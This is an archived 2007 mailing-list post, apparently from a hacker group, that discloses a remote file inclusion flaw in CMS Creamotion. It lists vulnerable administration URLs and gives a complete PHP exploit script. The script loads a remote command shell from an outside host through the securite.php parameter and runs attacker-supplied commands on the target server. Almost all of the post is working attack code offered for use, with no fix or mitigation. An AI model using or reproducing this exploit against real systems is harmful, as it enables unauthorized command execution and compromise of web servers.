Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

CMS Creamotion - Remote File inclusion

From: <security(at)soqor.net>
Date: Sat Oct 06 2007 - 11:42:32 EDT


Hello,,

CMS Creamotion - Remote File include

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Remote File including :

/_administration/securite.php?cfg[document_uri]=[Shell_DIR]

/_administration/gestion_configurations/save_config.php?cfg[document_uri]=[Shell_DIR]

Exploit :
#!/usr/bin/php -q -d short_open_tag=on
<?

/*
/*      CMS Creamotion - Remote File include
/*  This exploit should allow you to execute commands
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT

*/
print_r('
/**********************************************/
/*     CMS Creamotion Command Execution       */
/*    by HACKERS PAL      */
/*         site: 
http://www.soqor.net         */');
if ($argc<3) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/* php '.$argv[0].' http://localhost/ id
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
$url=$argv[1];
$cmd=$argv[2];
$exploit="/_administration/securite.php?cfg[document_uri]=
http://members.lycos.co.uk/soqor10/cmd.txt?";
$page=$url.$exploit;

         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);
                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }
     $npage    = get_page($page);


     if(eregi("Cannot execute a blank command",$npage))
     {
             $pagecmd=$page."&cmd=$cmd";
       Die("\n[+] Exploit Is Working\n[+] Result For CMD : ".get_page($pagecmd)."\n[+] See The Vulnerabiliy article for more informations\n/*        Visit us : WwW.SoQoR.NeT            */\n/**********************************************/");
             }
             Else
             {
                Die("\n[-] Exploit Failed\n/*        Visit us : WwW.SoQoR.NeT            */\n/**********************************************/");
Do you need help?X
}

#WwW.SoQoR.NeT
?>

WwW.SoQoR.NeT Received on Sat Oct 6 13:01:24 2007

Do you need more help?X

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:19:39 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library